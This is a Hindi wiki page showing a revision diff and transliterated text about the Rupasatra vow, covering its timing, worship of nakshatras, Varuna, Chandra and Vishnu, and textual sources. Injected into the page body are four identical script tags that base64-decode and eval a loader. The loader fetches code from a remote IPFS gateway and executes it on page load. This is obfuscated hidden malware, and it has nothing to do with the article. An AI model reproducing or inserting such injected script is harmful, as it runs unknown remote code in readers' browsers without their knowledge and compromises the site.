Difference between revisions of "रूपसत्र"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 2: Line 2:
 
*यह व्रत [[फाल्गुन]] की [[पूर्णिमा]] के उपरान्त [[कृष्णाष्टमी]] पर जब [[मूल नक्षत्र]] हो तब आरम्भ होता है।  
 
*यह व्रत [[फाल्गुन]] की [[पूर्णिमा]] के उपरान्त [[कृष्णाष्टमी]] पर जब [[मूल नक्षत्र]] हो तब आरम्भ होता है।  
 
*इसमें [[नक्षत्र]], उसके स्वामी, [[वरुण देवता|वरुण]], [[चंद्र देवता|चन्द्र]] एवं [[विष्णु]] की पूजा, होम और गुरु सम्मान करना चाहिए।  
 
*इसमें [[नक्षत्र]], उसके स्वामी, [[वरुण देवता|वरुण]], [[चंद्र देवता|चन्द्र]] एवं [[विष्णु]] की पूजा, होम और गुरु सम्मान करना चाहिए।  
*दूसरे दिन उपवास रखके [[केशव]] पूजा करनी चाहिए। केशव के पाद से सिर तक विभिन्न अंगों पर विभिन्न नक्षत्रों का न्यास, [[चैत्र]] [[शुक्ल पक्ष]] के अन्त में सत्र समाप्ति करनी चाहिए। अन्त में [[भारत के पुष्प|पुष्पों]], धूप आदि से विष्णु पूजा करनी चाहिए। <ref>ऋग्वेद (1|22|20)</ref> के मंत्र से होम, गुरु को दान, ब्रह्म भोज करना चाहिए।  *इससे स्वर्ग में वास तथा लौटने पर राजा बनते हैं। <ref>हेमाद्रि (व्रतखण्ड 2, 671-675, विष्णुधर्मोत्तरपुराण से उद्धरण)</ref>  
+
*दूसरे दिन उपवास रखके [[केशव]] पूजा करनी चाहिए। केशव के पाद से सिर तक विभिन्न अंगों पर विभिन्न नक्षत्रों का न्यास, [[चैत्र]] [[शुक्ल पक्ष]] के अन्त में सत्र समाप्ति करनी चाहिए।  
*बृहत्संहिता <ref>बृहत्संहिता (104|6-13)</ref> जहाँ पर यही व्रत चैत्र [[कृष्ण पक्ष]] की अष्टमी को उपवास एवं [[नारायण]] तथा नक्षत्र की पूजा के साथ वर्णित है।
+
*अन्त में [[भारत के पुष्प|पुष्पों]], धूप आदि से विष्णु पूजा करनी चाहिए।<ref>[[ऋग्वेद]] (1|22|20)</ref> के मंत्र से होम, गुरु को दान, ब्रह्म भोज करना चाहिए।   
 +
*इससे स्वर्ग में वास तथा लौटने पर राजा बनते हैं।<ref>हेमाद्रि (व्रतखण्ड 2, 671-675, विष्णुधर्मोत्तरपुराण से उद्धरण)</ref>  
 +
*बृहत्संहिता<ref>बृहत्संहिता (104|6-13)</ref> जहाँ पर यही व्रत चैत्र [[कृष्ण पक्ष]] की अष्टमी को उपवास एवं [[नारायण]] तथा नक्षत्र की पूजा के साथ वर्णित है।
  
 
{{लेख प्रगति
 
{{लेख प्रगति

Revision as of 06:39, 10 September 2010

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullakhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat phalgun ki poornima ke uparant krishnaashtami par jab mool nakshatr ho tab arambh hota hai.
  • isamean nakshatr, usake svami, varun, chandr evan vishnu ki pooja, hom aur guru samman karana chahie.
  • doosare din upavas rakhake keshav pooja karani chahie. keshav ke pad se sir tak vibhinn aangoan par vibhinn nakshatroan ka nyas, chaitr shukl paksh ke ant mean satr samapti karani chahie.
  • ant mean pushpoan, dhoop adi se vishnu pooja karani chahie.[1] ke mantr se hom, guru ko dan, brahm bhoj karana chahie.
  • isase svarg mean vas tatha lautane par raja banate haian.[2]
  • brihatsanhita[3] jahaan par yahi vrat chaitr krishna paksh ki ashtami ko upavas evan narayan tatha nakshatr ki pooja ke sath varnit hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. rrigved (1|22|20)
  2. hemadri (vratakhand 2, 671-675, vishnudharmottarapuran se uddharan)
  3. brihatsanhita (104|6-13)

sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>